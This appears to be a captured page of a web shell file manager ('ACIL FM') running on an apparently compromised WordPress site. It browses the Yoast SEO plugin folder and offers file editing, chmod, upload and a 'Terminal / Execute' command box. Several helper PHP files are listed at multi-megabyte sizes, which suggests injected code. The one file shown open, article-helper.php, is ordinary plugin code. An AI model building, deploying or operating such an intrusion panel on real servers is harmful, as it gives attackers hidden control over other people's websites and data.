ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/helpers/schema
/
home
mhhtmff
www
site
wp-content
plugins
wordpress-seo
src
helpers
schema
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
article-helper.php
877 B
chmod
View
DL
Edit
Rename
Delete
html-helper.php
1.98 MB
chmod
View
DL
Edit
Rename
Delete
id-helper.php
691 B
chmod
View
DL
Edit
Rename
Delete
image-helper.php
6.02 MB
chmod
View
DL
Edit
Rename
Delete
language-helper.php
818 B
chmod
View
DL
Edit
Rename
Delete
replace-vars-helper.php
3.47 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php
<?php namespace Yoast\WP\SEO\Helpers\Schema; /** * Class Article_Helper. */ class Article_Helper { /** * Determines whether a given post type should have Article schema. * * @param string|null $post_type Post type to check. * * @return bool True if it has Article schema, false if not. */ public function is_article_post_type( $post_type = null ) { if ( \is_null( $post_type ) ) { $post_type = \get_post_type(); } return $this->is_author_supported( $post_type ); } /** * Checks whether author is supported for the passed object sub type. * * @param string $object_sub_type The sub type of the object to check author support for. * * @return bool True if author is supported for the passed object sub type. */ public function is_author_supported( $object_sub_type ) { return \post_type_supports( $object_sub_type, 'author' ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply